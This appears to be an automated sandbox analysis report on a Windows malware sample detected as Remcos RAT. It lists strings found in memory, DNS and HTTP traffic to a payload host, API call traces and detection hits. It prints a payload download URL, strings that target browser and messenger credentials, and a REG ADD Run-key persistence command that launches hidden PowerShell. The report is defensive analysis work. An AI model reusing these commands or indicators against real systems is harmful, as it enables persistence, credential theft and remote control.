            Source: wabmig.exe, 0000000C.00000002.3772888228.0000000023200000.00000040.10000000.00040000.00000000.sdmp, wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
            Source: wabmig.exe, wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
            Source: wabmig.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: wabmig.exe, 00000011.00000002.2457479475.0000000002F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: p://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
            Source: wabmig.exe, 00000011.00000002.2457479475.0000000002F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: p://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
            Source: wabmig.exe, 0000000C.00000002.3773226942.0000000023A70000.00000040.10000000.00040000.00000000.sdmp, wabmig.exe, 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
            Source: wabmig.exe, 0000000C.00000002.3773226942.0000000023A70000.00000040.10000000.00040000.00000000.sdmp, wabmig.exe, 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: cmgtrading.eu
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: bhvB258.tmp.17.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: bhvB258.tmp.17.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
            Source: wabmig.exe, 0000000C.00000002.3760843591.00000000076C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cmgtrading.eu/CubBVEODo227.bin
            Source: wabmig.exe, 0000000C.00000002.3760843591.00000000076C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cmgtrading.eu/CubBVEODo227.binzRZs
            Source: wabmig.exe, 0000000C.00000002.3760843591.00000000076C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cmgtrading.eu/CubBVEODo227.bin~
            Source: bhvB258.tmp.17.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
            Source: bhvB258.tmp.17.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: bhvB258.tmp.17.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: wabmig.exe, 0000000C.00000003.2418303629.0000000007728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
            Source: wabmig.exe, 0000000C.00000003.2418303629.0000000007728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpR
            Source: wabmig.exe, 0000000C.00000002.3760957849.000000000772A000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000C.00000003.2460189386.000000000772A000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000C.00000003.2423083446.000000000772A000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000C.00000003.2418303629.0000000007728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpk
            Source: wabmig.exe, 0000000C.00000003.2418303629.0000000007728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
            Source: SecuriteInfo.com.FileRepMalware.12793.28433.exe, SecuriteInfo.com.FileRepMalware.12793.28433.exe.7.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000007.00000002.2403198277.0000000006190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: bhvB258.tmp.17.drString found in binary or memory: http://ocsp.digicert.com0
            Source: powershell.exe, 00000007.00000002.2400944448.0000000005276000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000007.00000002.2400944448.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000007.00000002.2400944448.0000000005276000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: wabmig.exe, wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
            Source: wabmig.exe, wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wabmig.exe, 00000013.00000002.2432235624.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
            Source: wabmig.exe, 00000013.00000002.2432235624.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.coma
            Source: wabmig.exe, 0000000C.00000002.3772888228.0000000023200000.00000040.10000000.00040000.00000000.sdmp, wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
            Source: wabmig.exe, 0000000C.00000002.3772888228.0000000023200000.00000040.10000000.00040000.00000000.sdmp, wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
            Source: wabmig.exe, 00000011.00000002.2457021842.0000000002AE4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
            Source: wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
            Source: powershell.exe, 00000007.00000002.2400944448.0000000005121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: wabmig.exe, 0000000C.00000002.3760843591.0000000007705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cmgtrading.eu/=
            Source: wabmig.exe, 0000000C.00000002.3760843591.00000000076C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cmgtrading.eu/CubBVEODo227.bin
            Source: wabmig.exe, 0000000C.00000002.3760843591.00000000076C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cmgtrading.eu/CubBVEODo227.binc
            Source: wabmig.exe, 0000000C.00000002.3760843591.0000000007705000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cmgtrading.eu/k
            Source: powershell.exe, 00000007.00000002.2403198277.0000000006190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000007.00000002.2403198277.0000000006190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000007.00000002.2403198277.0000000006190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000007.00000002.2400944448.0000000005276000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: wabmig.exe, 00000011.00000002.2457777519.0000000003165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20
            Source: wabmig.exe, 00000011.00000002.2457777519.0000000003165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: wabmig.exe, 00000011.00000002.2457777519.0000000003165000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: wabmig.exe, 00000011.00000002.2457777519.0000000003165000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 00000011.00000003.2456199398.0000000002F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: wabmig.exe, wabmig.exe, 00000011.00000002.2457479475.0000000002F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/config/login
            Source: powershell.exe, 00000007.00000002.2403198277.0000000006190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: wabmig.exe, wabmig.exe, 00000013.00000002.2430473213.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: wabmig.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
            Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
            Source: unknownHTTPS traffic detected: 185.26.107.57:443 -> 192.168.2.10:49981 version: TLS 1.2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeCode function: 5_2_004053EF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,5_2_004053EF
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,17_2_0040987A
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,17_2_004098E2
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,18_2_00406DFC
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,18_2_00406E9F
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 19_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,19_2_004068B5
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 19_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,19_2_004072B5

            E-Banking Fraud

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 0000000C.00000002.3760957849.000000000772A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000003.2460189386.000000000772A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000003.2423083446.000000000772A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000003.2418303629.0000000007728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wabmig.exe PID: 3200, type: MEMORYSTR

            System Summary

            barindex
            Powershell drops PE file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer\SecuriteInfo.com.FileRepMalware.12793.28433.exeJump to dropped file
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,17_2_0040DD85
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_00401806 NtdllDefWindowProc_W,17_2_00401806
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_004018C0 NtdllDefWindowProc_W,17_2_004018C0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_004016FD NtdllDefWindowProc_A,18_2_004016FD
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_004017B7 NtdllDefWindowProc_A,18_2_004017B7
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 19_2_00402CAC NtdllDefWindowProc_A,19_2_00402CAC
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 19_2_00402D66 NtdllDefWindowProc_A,19_2_00402D66
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeCode function: 5_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_0040333D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeFile created: C:\Windows\Fonts\Urim.iniJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeCode function: 5_2_004069565_2_00406956
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeCode function: 5_2_00404C2C5_2_00404C2C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04A3EAE07_2_04A3EAE0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04A3F3B07_2_04A3F3B0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04A3E7987_2_04A3E798
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_078CC93E7_2_078CC93E
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 12_2_2324719412_2_23247194
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 12_2_2323B5C112_2_2323B5C1
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_0044B04017_2_0044B040
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_0043610D17_2_0043610D
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_0044731017_2_00447310
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_0044A49017_2_0044A490
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_0040755A17_2_0040755A
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_0043C56017_2_0043C560
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_0044B61017_2_0044B610
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_0044D6C017_2_0044D6C0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_004476F017_2_004476F0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_0044B87017_2_0044B870
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_0044081D17_2_0044081D
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_0041495717_2_00414957
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_004079EE17_2_004079EE
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_00407AEB17_2_00407AEB
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_0044AA8017_2_0044AA80
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_00412AA917_2_00412AA9
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_00404B7417_2_00404B74
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_00404B0317_2_00404B03
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_0044BBD817_2_0044BBD8
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_00404BE517_2_00404BE5
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_00404C7617_2_00404C76
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_00415CFE17_2_00415CFE
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_00416D7217_2_00416D72
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_00446D3017_2_00446D30
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_00446D8B17_2_00446D8B
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_00406E8F17_2_00406E8F
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_0040503818_2_00405038
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_0041208C18_2_0041208C
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_004050A918_2_004050A9
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_0040511A18_2_0040511A
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_0043C13A18_2_0043C13A
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_004051AB18_2_004051AB
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_0044930018_2_00449300
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_0040D32218_2_0040D322
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_0044A4F018_2_0044A4F0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_0043A5AB18_2_0043A5AB
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_0041363118_2_00413631
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_0044669018_2_00446690
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_0044A73018_2_0044A730
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_004398D818_2_004398D8
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_004498E018_2_004498E0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_0044A88618_2_0044A886
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_0043DA0918_2_0043DA09
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_00438D5E18_2_00438D5E
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_00449ED018_2_00449ED0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_0041FE8318_2_0041FE83
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 18_2_00430F5418_2_00430F54
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 19_2_004050C219_2_004050C2
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 19_2_004014AB19_2_004014AB
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 19_2_0040513319_2_00405133
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 19_2_004051A419_2_004051A4
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 19_2_0040124619_2_00401246
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 19_2_0040CA4619_2_0040CA46
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 19_2_0040523519_2_00405235
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 19_2_004032C819_2_004032C8
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 19_2_0040168919_2_00401689
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 19_2_00402F6019_2_00402F60
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: String function: 004169A7 appears 86 times
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: String function: 0044DB70 appears 41 times
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: String function: 004165FF appears 35 times
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: String function: 00422297 appears 42 times
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: String function: 00444B5A appears 37 times
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: String function: 00413025 appears 78 times
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: String function: 00416760 appears 69 times
            Source: SecuriteInfo.com.FileRepMalware.12793.28433.exeStatic PE information: invalid certificate
            Source: SecuriteInfo.com.FileRepMalware.12793.28433.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)"
            Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@17/14@2/3
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,17_2_004182CE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeCode function: 5_2_0040333D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_0040333D
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 19_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,19_2_00410DE1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeCode function: 5_2_004046B0 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,5_2_004046B0
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,17_2_00413D4C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeCode function: 5_2_004020FE CoCreateInstance,5_2_004020FE
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeCode function: 17_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,17_2_0040B58D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeFile created: C:\Users\user\AppData\Roaming\euthanasicJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-DSGECX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2732:120:WilError_03
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeFile created: C:\Users\user\AppData\Local\Temp\nswEF6A.tmpJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)"
            Source: SecuriteInfo.com.FileRepMalware.12793.28433.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exeSystem information queried: HandleInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: wabmig.exe, wabmig.exe, 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: wabmig.exe, wabmig.exe, 00000012.00000002.2429161201.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: wabmig.exe, 0000000C.00000002.3773226942.0000000023A70000.00000040.10000000.00040000.00000000.sdmp, wabmig.exe, 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: wabmig.exe, wabmig.exe, 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: wabmig.exe, wabmig.exe, 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: wabmig.exe, wabmig.exe, 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: wabmig.exe, 00000011.00000002.2458030122.0000000004B1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
